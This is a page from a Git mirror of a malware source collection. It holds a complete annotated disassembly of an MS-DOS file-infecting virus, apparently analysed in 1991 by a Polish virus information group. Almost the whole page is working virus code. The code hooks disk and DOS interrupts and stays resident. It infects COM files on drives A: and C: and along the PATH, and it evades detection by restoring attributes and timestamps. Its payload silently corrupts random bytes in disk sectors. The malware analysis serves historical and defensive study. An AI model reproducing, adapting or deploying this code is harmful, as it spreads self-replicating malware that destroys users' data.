Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-27 09:28:25 +00:00
Code Releases Activity
main
vxug-MalwareSourceCode/MSDOS/V-Index/Virus.MSDOS.Unknown.v1385.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

906 lines
27 KiB
NASM
Raw Permalink Blame History

;-------------------------------------------------
; Virus
;
; dissasembled by Andrzej Kadlof July 1991
;
; (C) Polish section of Virus Information Bank
;------------------------------------------------
0100 E97801 JMP 027B
; old INT 13h vector
0103 7A0F
0105 7000
;====================
; INT 13h handler
0107 9C PUSHF
0108 50 PUSH AX
0109 53 PUSH BX
010A 51 PUSH CX
010B 52 PUSH DX
010C 1E PUSH DS
010D 06 PUSH ES
010E 57 PUSH DI
010F 0E PUSH CS
0110 1F POP DS
0111 50 PUSH AX
0112 B000 MOV AL,00
0114 3D0002 CMP AX,0200 ; request: read sectors?
0117 58 POP AX ; restore oryginal function number
0118 7571 JNZ 018B ; no, exit
011A 80F900 CMP CL,00 ; first sector number (illegal)
011D 7518 JNZ 0137 ; not zero, not virus question
011F 81FF3412 CMP DI,1234 ; question from new copy of virus
0123 7512 JNZ 0137 ; no
; prepare answer for the question from next virsus copy
0125 5F POP DI
0126 BF2143 MOV DI,4321 ; answer: I'm here!
0129 58 POP AX
012A 58 POP AX
012B A19901 MOV AX,[0199] ; old INT 21h
012E 50 PUSH AX
012F A19B01 MOV AX,[019B]
0132 50 PUSH AX
0133 57 PUSH DI
0134 EB55 JMP 018B ; exit
0136 90 NOP
; check cylinder number, if not 4x + 2 or 4x + 3 then exit (x arbitrary)
0137 51 PUSH CX
0138 81E100FC AND CX,FC00
013C 80FD00 CMP CH,00
013F 59 POP CX
0140 7449 JZ 018B ; exit
; check time condition
0142 51 PUSH CX
0143 52 PUSH DX
0144 B80000 MOV AX,0000
0147 FB STI
0148 CD1A INT 1A ; read the clock
014A 81E2FF0F AND DX,0FFF ; low word of tick count since reset
014E 83FA00 CMP DX,+00 ; about 3.7 min
0151 5A POP DX
0152 59 POP CX
0153 7536 JNZ 018B ; exit
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
; DESTRUCTION! change one byte on the sector on the next track
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
0155 9C PUSHF
0156 0E PUSH CS ; segment of return address
0157 B86601 MOV AX,0166 ; offset of return address
015A 50 PUSH AX
015B B80102 MOV AX,0201 ; read 1 sector
015E 80C501 ADD CH,01 ; next track
0161 2EFF2E0301 JMP DWORD PTR CS:[0103] ; CALL FAR INT 13h
0166 7223 JB 018B ; exit
; get random number between 0 and 1FFh (minimal buffer size)
0168 51 PUSH CX
0169 52 PUSH DX
016A B80000 MOV AX,0000
016D FB STI
016E CD1A INT 1A ; read the clock
0170 81E2FF01 AND DX,01FF ; low word of tick count since reset
; change one byte inside buffer
0174 53 PUSH BX ; offset of buffer
0175 03DA ADD BX,DX ; random byte in buffer
0177 26880F MOV ES:[BX],CL ; undefined value (first sector)
017A 5B POP BX ; restore buffer address
; write buffer back to disk
017B 5A POP DX ; disk/head
017C 59 POP CX ; track/sector
017D 9C PUSHF
017E 0E PUSH CS ; segment of return address
017F B88B01 MOV AX,018B ; offset of return address
0182 50 PUSH AX
0183 B80103 MOV AX,0301 ; write 1 sector
0186 2EFF2E0301 JMP DWORD PTR CS:[0103] ; CALL FAR INT 13h
; exit to old INT 13h
018B 5F POP DI
018C 07 POP ES
018D 1F POP DS
018E 5A POP DX
018F 59 POP CX
0190 5B POP BX
0191 58 POP AX
0192 9D POPF
0193 2EFF2E0301 JMP DWORD PTR CS:[0103] ; INT 13h
0198 90 NOP
;---------------
; working area
; old INT 21h vector
0199 9E10
019B 1801
019D 26 0D ; segment of environment block
019F 80 00 ; address of command line
01A1 2B 0D ; CS
01A3 5C 00 ; first FCB in PSP
01A5 2B 0D ; CS
01A7 6C 00 ; second FCB in PSP
01A9 2B 0D ; CS
01AB CF 01 ; runtime SP
01AD 2B 0D ; old SS, CS
01AF 02 19 ; old SP
;------------
; local stack
01B1 9D01
01B3 857F
01B5 FF58
01B7 2B0D
01B9 2F01
01BB E37F
01BD D300
01BF 0001
02C1 2C00
01C3 260D
02C5 2B0D
01C7 430C
01C9 2903
01CB 2B0D
01CD 02F2
; end of local stack
;-------------------
01CF 90 NOP
01D0 90 NOP
;=====================
; INT 21h handler
01D1 9C PUSHF
01D2 56 PUSH SI
01D3 50 PUSH AX
01D4 53 PUSH BX
01D5 51 PUSH CX
01D6 52 PUSH DX
01D7 1E PUSH DS
01D8 06 PUSH ES
01D9 57 PUSH DI
01DA 80FC4B CMP AH,4B ; load and execute
01DD 7555 JNZ 0234 ; exit
01DF 1E PUSH DS
01E0 52 PUSH DX
01E1 0E PUSH CS
01E2 1F POP DS
01E3 C70698036906 MOV WORD PTR [0398],0669 ; virus length
01E9 E8E203 CALL 05CE ; intercept INT 24h and prepare local DTA
01EC 5F POP DI
01ED 07 POP ES
01EE 06 PUSH ES
01EF 57 PUSH DI
01F0 B80000 MOV AX,0000
01F3 B98000 MOV CX,0080
01F6 F2AE REPNZ SCASB
01F8 83F900 CMP CX,+00
01FB 7432 JZ 022F
01FD 4F DEC DI
01FE B05C MOV AL,5C ; '\'
0200 4F DEC DI
0201 AE SCASB
0202 75F9 JNZ 01FD
0204 57 PUSH DI
0205 59 POP CX
0206 5E POP SI
0207 1F POP DS
0208 0E PUSH CS
0209 07 POP ES
020A BF6906 MOV DI,0669 ; buffer (area behind virus code)
020D AC LODSB
020E AA STOSB
020F 3BF1 CMP SI,CX
0211 75FA JNZ 020D
0213 0E PUSH CS
0214 1F POP DS
0215 893EA203 MOV [03A2],DI
0219 BEAC03 MOV SI,03AC
021C B90600 MOV CX,0006
021F AC LODSB
0220 AA STOSB
0221 E2FC LOOP 021F
0223 BA6906 MOV DX,0669
0226 E87302 CALL 049C ; find and infect one COM file
0229 E8D703 CALL 0603 ; restore DTA and INT 24h
022C EB06 JMP 0234 ; exit
022E 90 NOP
022F 58 POP AX
0230 58 POP AX
0231 E8CF03 CALL 0603 ; restore DTA and INT 24h
; exit to old INT 21h
0234 90 NOP
0235 5F POP DI
0236 07 POP ES
0237 1F POP DS
0238 5A POP DX
0239 59 POP CX
023A 5B POP BX
023B 58 POP AX
023C 5E POP SI
023D 9D POPF
023E 2EFF2E9901 JMP DWORD PTR CS:[0199]
0243 90 NOP
;------------------------
; prepare Load & Execute
0244 8CC0 MOV AX,ES
0246 8BE8 MOV BP,AX
0248 8BD7 MOV DX,DI ; offset of victim name
024A 8CC8 MOV AX,CS
024C 8EC0 MOV ES,AX ; segment of victim name
024E BB9D01 MOV BX,019D ; run parameters
0251 06 PUSH ES
0252 53 PUSH BX
0253 8CC8 MOV AX,CS ; block segment
0255 8EC0 MOV ES,AX
0257 BBD300 MOV BX,00D3 ; block size in paragraphs
025A B44A MOV AH,4A ; resize memory block
025C CD21 INT 21
; free environment block
025E BF2C00 MOV DI,002C ; address of environment block in PSP
0261 8E05 MOV ES,[DI] ; segment of environment
0263 B80049 MOV AX,4900 ; free memory block
0266 CD21 INT 21
0268 5B POP BX
0269 07 POP ES
026A 58 POP AX
026B 8C0EAD01 MOV [01AD],CS
026F 8E16AD01 MOV SS,[01AD]
0273 8B26AB01 MOV SP,[01AB]
0277 8EDD MOV DS,BP
0279 50 PUSH AX
027A C3 RET
;===========================
; virus entry point
; look for resident part of virus in RAM
; on system with 3 floppy drives this test may hang the computer
; (unspecified I/O buffer BX)
027B B203 MOV DL,03 ; third floppy drive
027D B600 MOV DH,00 ; head 0
027F B100 MOV CL,00 ; first sector 0
0281 B500 MOV CH,00 ; track
0283 B80102 MOV AX,0201 ; read 1 sector
0286 BF3412 MOV DI,1234 ; is already in memory?
0289 CD13 INT 13
028B 81FF2143 CMP DI,4321 ; expected answer
028F 7503 JNZ 0294 ; memory is clear
0291 E92601 JMP 03BA ; exit
; intercept INT 21h and INT 13h
0294 B82135 MOV AX,3521 ; get INT 21h
0297 CD21 INT 21
0299 891E9901 MOV [0199],BX
029D 8C069B01 MOV [019B],ES
02A1 BAD101 MOV DX,01D1
02A4 B82125 MOV AX,2521 ; set INT 21h
02A7 CD21 INT 21
02A9 B435 MOV AH,35 ; get INT 13h
02AB B013 MOV AL,13
02AD CD21 INT 21
02AF 891E0301 MOV [0103],BX
02B3 8C060501 MOV [0105],ES
02B7 B425 MOV AH,25 ; set INT 13h
02B9 B013 MOV AL,13
02BB BA0701 MOV DX,0107
02BE CD21 INT 21
; prepare Load & Execute
02C0 BF2C00 MOV DI,002C ; address of environment in PSP
02C3 8B05 MOV AX,[DI]
02C5 A39D01 MOV [019D],AX
02C8 8C0EA101 MOV [01A1],CS
02CC C7069F018000 MOV WORD PTR [019F],0080 ; command line
02D2 8C0EA501 MOV [01A5],CS
02D6 C706A3015C00 MOV WORD PTR [01A3],005C ; first FCB in PSP
02DC 8C0EA901 MOV [01A9],CS
02E0 C706A7016C00 MOV WORD PTR [01A7],006C ; second FCB
; look for program name (DOS 3.x or higher)
02E6 FC CLD
02E7 BF2C00 MOV DI,002C ; segment of environment block
02EA 8E05 MOV ES,[DI]
02EC BF0000 MOV DI,0000 ; start of environment
02EF B80000 MOV AX,0000 ; end of block marker
02F2 B90080 MOV CX,8000 ; maxim block size
02F5 2BCF SUB CX,DI ; end of block
02F7 7230 JB 0329 ; not found
02F9 F2AE REPNZ SCASB
02FB B80000 MOV AX,0000
02FE AE SCASB
02FF 75EE JNZ 02EF
0301 B80100 MOV AX,0001
0304 AE SCASB
0305 7522 JNZ 0329
0307 B80000 MOV AX,0000
030A AE SCASB
030B 751C JNZ 0329
030D E834FF CALL 0244 ; prepare Load & Execute
0310 B8004B MOV AX,4B00 ; load and execute
0313 E86F00 CALL 0385 ; INT 21h
; clear environment block
0316 0E PUSH CS
0317 1F POP DS
0318 BF2C00 MOV DI,002C ; environment
031B B80000 MOV AX,0000 ; end of block marker
031E 8905 MOV [DI],AX ; start of block
0320 BAD300 MOV DX,00D3 ; size of virus block in paragraphs
0323 B80031 MOV AX,3100 ; terminate and state resident
0326 E85C00 CALL 0385 ; far call to INT 21h
; victim name not found (DOS < 3.0)
; execute command >C:\COMMAND.COM /P
0329 E818FF CALL 0244 ; prepare Load & Execute
032C 0E PUSH CS
032D 1F POP DS
032E BA7603 MOV DX,0376 ; 'c:\command.com',0
0331 57 PUSH DI
0332 BF8000 MOV DI,0080 ; command line
0335 C705022F MOV WORD PTR [DI],2F02 ; 2, '/'
0339 C74502500D MOV WORD PTR [DI+02],0D50 ; 'P', CR
033E 5F POP DI
033F B8004B MOV AX,4B00 ; load and execute
0342 E84000 CALL 0385 ; far call to INT 21h
0345 B86300 MOV AX,0063 ; 'c'
0348 57 PUSH DI
0349 BF7603 MOV DI,0376 ; 'c:\command.com',0
034C 8805 MOV [DI],AL
034E 5F POP DI
034F B8004B MOV AX,4B00 ; load and execute
0352 E83000 CALL 0385 ; far call to INT 21h
; restore INT 13h
0355 B81325 MOV AX,2513 ; set INT 13h
0358 8B160301 MOV DX,[0103]
035C FF360501 PUSH [0105]
0360 1F POP DS
0361 CD21 INT 21
; restore INT 13h
0363 B82125 MOV AX,2521
0366 8B169901 MOV DX,[0199]
036A FF369B01 PUSH [019B]
036E 1F POP DS
036F CD21 INT 21
0371 0E PUSH CS
0372 1F POP DS
0373 EB45 JMP 03BA
0375 90 NOP
0376 63 3A 5C 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 ; c:\COMMAND.COM
;---------------------
; FAR CALL to INT 21h
0385 2E8F069603 POP CS:[0396] ; offset of caller
038A 9C PUSHF ; prepare jump to INT 21h
038B 0E PUSH CS ; segment of return address
038C 2EFF369603 PUSH CS:[0396] ; offset of return addres
0391 2EFF2E9901 JMP DWORD PTR CS:[0199] ; CALL FAR INT 13h
;--------------
; working area
0396 96 05 ; place for offset of return address
0398 60 D2 ; length of victim
039A 80 00 ; old DTA offset
039C C2 0A ; old DTA segment
039E 00 00 ; counter ?
03A0 00 00 ; DS
03A2 FA CC ; working, end of path
03A4 50 41 54 48 3D ; PATH=
03A9 61 3A 5C 2A 2E 63 6F 6D 00 ; a:\*.com, 0
; old INT 24h
03B2 49 01 ; offset
03B4 48 09 ; segment
;==================
; INT 24h handler
03B6 90 NOP
03B7 B003 MOV AL,03
03B9 CF IRET
;---------------------------------
; virus alredy resident, continue
03BA 06 PUSH ES
03BB 1E PUSH DS
03BC 0E PUSH CS
03BD 1F POP DS
03BE 8F069901 POP [0199] ; old INT 21h offset
03C2 8F069B01 POP [019B] ; old INT 21h segment
03C6 E80502 CALL 05CE ; prepare INT 24h and DTA
03C9 BEA903 MOV SI,03A9 ; address of 'a:\*.com, 0'
03CC 8B3E9803 MOV DI,[0398] ; buffer outside viruse code
03D0 B90900 MOV CX,0009 ; number of bytes
03D3 AC LODSB
03D4 AA STOSB
03D5 E2FC LOOP 03D3
03D7 8B3E9803 MOV DI,[0398] ; buffer
03DB 83C703 ADD DI,+03
03DE 893EA203 MOV [03A2],DI
03E2 8B3E9803 MOV DI,[0398]
03E6 B86100 MOV AX,0061 ; drive 'a'
03E9 8805 MOV [DI],AL ; patch 'a:\*.com', 0
03EB 8BD7 MOV DX,DI ; buffer
03ED E8AC00 CALL 049C ; find and infect one COM program
03F0 BEA903 MOV SI,03A9
03F3 8B3E9803 MOV DI,[0398]
03F7 B90900 MOV CX,0009
03FA AC LODSB
03FB AA STOSB
03FC E2FC LOOP 03FA
03FE 8B3E9803 MOV DI,[0398]
0402 B86300 MOV AX,0063 ; drive 'c'
0405 8805 MOV [DI],AL ; patch 'a:\*.com', 0
0407 8BD7 MOV DX,DI
0409 E89000 CALL 049C ; find and infect one COM program
040C 7203 JB 0411
040E E91302 JMP 0624
0411 BF2C00 MOV DI,002C ; environment
0414 8E05 MOV ES,[DI]
0416 BF0000 MOV DI,0000
0419 BEA403 MOV SI,03A4 ; 'PATH='
041C 46 INC SI
041D B85000 MOV AX,0050 ; 'P'
0420 B90080 MOV CX,8000 ; max block size
0423 2BCF SUB CX,DI
0425 7303 JAE 042A
0427 E9FA01 JMP 0624 ; not found
042A F2AE REPNZ SCASB
042C B90400 MOV CX,0004
042F AC LODSB
0430 AE SCASB
0431 75E6 JNZ 0419
0433 E2FA LOOP 042F
0435 8B369803 MOV SI,[0398]
0439 56 PUSH SI
043A 57 PUSH DI
043B 5E POP SI
043C 5F POP DI
043D 06 PUSH ES
043E 0E PUSH CS
043F 07 POP ES
0440 1F POP DS
0441 AC LODSB
0442 AA STOSB
0443 3C3B CMP AL,3B ; ';' end of path marker
0445 7409 JZ 0450
0447 3C00 CMP AL,00 ; end of block marker
0449 7402 JZ 044D
044B EBF4 JMP 0441 ; end of block
044D BE0000 MOV SI,0000
0450 1E PUSH DS
0451 0E PUSH CS
0452 1F POP DS
0453 8F06A003 POP [03A0]
0457 89369E03 MOV [039E],SI
045B 4F DEC DI
045C 4F DEC DI
; check for last character '\', add if necessary
045D B05C MOV AL,5C ; '\'
045F 3805 CMP [DI],AL
0461 7403 JZ 0466
0463 47 INC DI
0464 8805 MOV [DI],AL
0466 47 INC DI
; form new path ....\*.com, 0
0467 BEAC03 MOV SI,03AC ; *.com
046A 893EA203 MOV [03A2],DI
046E B90600 MOV CX,0006 ; length
0471 AC LODSB
0472 AA STOSB
0473 E2FC LOOP 0471
0475 A19803 MOV AX,[0398] ; buffer
0478 8BD0 MOV DX,AX
047A E81F00 CALL 049C ; find and infect COM file
047D 7203 JB 0482
047F E9A201 JMP 0624
0482 833E9E0300 CMP WORD PTR [039E],+00
0487 7503 JNZ 048C
0489 E99801 JMP 0624
048C A19803 MOV AX,[0398]
048F 8BF8 MOV DI,AX
0491 8B369E03 MOV SI,[039E]
0495 FF36A003 PUSH [03A0]
0499 1F POP DS
049A EBA5 JMP 0441
;---------------------------------
; find and infect one COM program
049C 0E PUSH CS
049D 07 POP ES
049E B8004E MOV AX,4E00 ; find first
04A1 B90300 MOV CX,0003 ; hiden, read only
04A4 E8DEFE CALL 0385 ; far call to INT 21h
04A7 730C JAE 04B5
04A9 C3 RET
04AA B44F MOV AH,4F ; find next
04AC B90300 MOV CX,0003 ; hiden, read only
04AF E8D3FE CALL 0385 ; far call to INT 21h
04B2 7301 JAE 04B5
04B4 C3 RET
; start infection
04B5 8B3E9803 MOV DI,[0398] ; buffer
04B9 81C78000 ADD DI,0080 ; set DI to DTA
04BD 83C71A ADD DI,+1A ; file length
04C0 8B05 MOV AX,[DI]
04C2 2D0010 SUB AX,1000 ; minimum victim size
04C5 7215 JB 04DC ; file too small, find next
04C7 8B05 MOV AX,[DI] ; file size
04C9 2DFFEF SUB AX,EFFF ; maximum file size
04CC 730E JAE 04DC ; file too big, find next
04CE 83EF04 SUB DI,+04 ; file time stamp
04D1 8B05 MOV AX,[DI]
04D3 241F AND AL,1F ; extract seconds
04D5 3C18 CMP AL,18 ; 48 seconds
04D7 7403 JZ 04DC ; infected, find next
04D9 EB03 JMP 04DE ; continue
04DB 90 NOP
04DC EBCC JMP 04AA ; find next
; copy file name to buffer
04DE 83C708 ADD DI,+08
04E1 8BF7 MOV SI,DI
04E3 8B3EA203 MOV DI,[03A2]
04E7 AC LODSB
04E8 AA STOSB
04E9 3C00 CMP AL,00
04EB 75FA JNZ 04E7
; find new file length
04ED 8B3E9803 MOV DI,[0398]
04F1 81C78000 ADD DI,0080 ; set DI to local DTA
04F5 83C71A ADD DI,+1A ; file length
04F8 8B05 MOV AX,[DI]
04FA 056906 ADD AX,0669 ; new file length
04FD FF369803 PUSH [0398]
0501 50 PUSH AX
; clear flag Read Only
0502 8B169803 MOV DX,[0398]
0506 B80043 MOV AX,4300 ; get attributes
0509 E879FE CALL 0385 ; far call to INT 21h
050C 890EC805 MOV [05C8],CX ; store old attributes
0510 81E1FEFF AND CX,FFFE ; clear read only flag
0514 B80143 MOV AX,4301 ; set attributes
0517 E86BFE CALL 0385 ; far call to INT 21h
051A 7233 JB 054F ; error, exit
; open file for read/write
051C B8023D MOV AX,3D02 ; open file for read/write
051F E863FE CALL 0385 ; far call to INT 21h
0522 722B JB 054F ; error, exit
; set 48 second in file time stamp
0524 8BD8 MOV BX,AX ; hundle
0526 B80057 MOV AX,5700 ; get time stamp
0529 E859FE CALL 0385 ; far call to INT 21h
052C 81E1E0FF AND CX,FFE0 ; clear seconds
0530 83C118 ADD CX,+18 ; set to 48
0533 890ECA05 MOV [05CA],CX ; store for later
0537 8916CC05 MOV [05CC],DX
; copy first 669h bytes of file to the end
; read beginnig of file (669h bytes)
053B B96906 MOV CX,0669 ; virus length
053E 81E90001 SUB CX,0100 ; size of PSP
0542 8B169803 MOV DX,[0398]
0546 81C20001 ADD DX,0100 ; buffer
054A B43F MOV AH,3F ; read file
054C E836FE CALL 0385 ; far call to INT 21h
054F 7271 JB 05C2 ; error, exit
; move file ptr back to BOF
0551 8BFA MOV DI,DX
0553 BA0000 MOV DX,0000
0556 B90000 MOV CX,0000
0559 B80242 MOV AX,4202 ; move file ptr to EOF
055C E826FE CALL 0385 ; far call to INT 21h
055F 7261 JB 05C2 ; error, exit
; vrite virus code to file
0561 8BD7 MOV DX,DI
0563 B96906 MOV CX,0669 ; virus length
0566 81E90001 SUB CX,0100
056A B440 MOV AH,40 ; write file
056C E816FE CALL 0385 ; far call to INT 21h
056F 7251 JB 05C2 ; error, exit
; move file ptr to EOF
0571 BA0000 MOV DX,0000
0574 B90000 MOV CX,0000
0577 B80042 MOV AX,4200 ; move file ptr to BOF
057A E808FE CALL 0385 ; far call to INT 21h
057D 7243 JB 05C2
; write to file its beginning block
057F 8F069803 POP [0398]
0583 FF369803 PUSH [0398]
0587 B96906 MOV CX,0669 ; end of virus code
058A 81E90001 SUB CX,0100 ; size of PSP
058E BA0001 MOV DX,0100 ; from buffer
0591 B440 MOV AH,40 ; write file
0593 E8EFFD CALL 0385 ; far call to INT 21h
0596 722A JB 05C2
; error, exit
; restore file time stamp
0598 8B0ECA05 MOV CX,[05CA] ; restore time stamp
059C 8B16CC05 MOV DX,[05CC] ; restore date stamp
05A0 B80157 MOV AX,5701 ; set file time stamp
05A3 E8DFFD CALL 0385 ; far call to INT 21h
; close file
05A6 B43E MOV AH,3E ; close file
05A8 E8DAFD CALL 0385 ; far call to INT 21h
; restore file attributes
05AB 8F069803 POP [0398]
05AF 8F069803 POP [0398]
05B3 8B169803 MOV DX,[0398]
05B7 8B0EC805 MOV CX,[05C8] ; retore file attributes
05BB B80143 MOV AX,4301 ; set file attributes
05BE E8C4FD CALL 0385 ; far call to INT 21h
05C1 C3 RET
; exit after any error
05C2 58 POP AX
05C3 8F069803 POP [0398]
05C7 C3 RET
05C8 20 00 ; file attributes
05CA D8A8 ; file time stamp
05CC D516 ; file date stamp
;-----------------------------------------
; intercept INT 24h and prepare local DTA
; get INT 24h
05CE B82435 MOV AX,3524 ; get INT 24h
05D1 E8B1FD CALL 0385 ; far call to INT 21h
05D4 891EB203 MOV [03B2],BX
05D8 8C06B403 MOV [03B4],ES
; set new INT 24h
05DC B425 MOV AH,25 ; set
05DE B024 MOV AL,24 ; int 24h
05E0 BAB603 MOV DX,03B6 ; offset of new handler
05E3 E89FFD CALL 0385 ; far call to INT 21h
; get current DTA
05E6 B42F MOV AH,2F ; get DTA
05E8 E89AFD CALL 0385 ; far call to INT 21h
05EB 8C069C03 MOV [039C],ES
05EF 891E9A03 MOV [039A],BX
; set new local DTA
05F3 B41A MOV AH,1A ; set DTA
05F5 0E PUSH CS
05F6 1F POP DS
05F7 8B169803 MOV DX,[0398]
05FB 81C28000 ADD DX,0080
05FF E883FD CALL 0385 ; far call to INT 21h
0602 C3 RET
;-------------------------
; restore INT 24h and DTA
; prepare registers
0603 0E PUSH CS
0604 1F POP DS
0605 0E PUSH CS
0606 07 POP ES
; restore INT 24h
0607 B82425 MOV AX,2524 ; set INT 24h
060A 8B16B203 MOV DX,[03B2]
060E 8E1EB403 MOV DS,[03B4]
0612 E870FD CALL 0385 ; far call to INT 21h
; retsore DTA
0615 8B169A03 MOV DX,[039A]
0619 FF369C03 PUSH [039C]
061D 1F POP DS
061E B41A MOV AH,1A
0620 E862FD CALL 0385 ; far call to INT 21h
0623 C3 RET
;---------------------
; exit to application
0624 E8DCFF CALL 0603 ; restore INT 24h and DTA
0627 0E PUSH CS
0628 1F POP DS
0629 BE3E06 MOV SI,063E ; start of oryginal code
062C 8B3E9803 MOV DI,[0398] ; length of victim
; copy victim code
0630 AC LODSB
0631 AA STOSB
0632 81FE6906 CMP SI,0669
0636 75F8 JNZ 0630
0638 8B3E9803 MOV DI,[0398] ; RET address
063C 57 PUSH DI
063D C3 RET
063E B96906 MOV CX,0669
0641 81E90001 SUB CX,0100
0645 8B369803 MOV SI,[0398]
0649 2BF1 SUB SI,CX
064B 0E PUSH CS
064C 1F POP DS
064D BF0001 MOV DI,0100
0650 AC LODSB
0651 AA STOSB
0652 E2FC LOOP 0650
0654 33C0 XOR AX,AX
0656 33DB XOR BX,BX
0658 33C9 XOR CX,CX
065A 33D2 XOR DX,DX
065C 33F6 XOR SI,SI
065E BF0001 MOV DI,0100
0661 57 PUSH DI
0662 33FF XOR DI,DI
0664 33ED XOR BP,BP
0666 C3 RET
0667 90 NOP
0668 90 NOP
; end resident part of virus
;-----------------------------
; victim code
View Git Blame Copy Permalink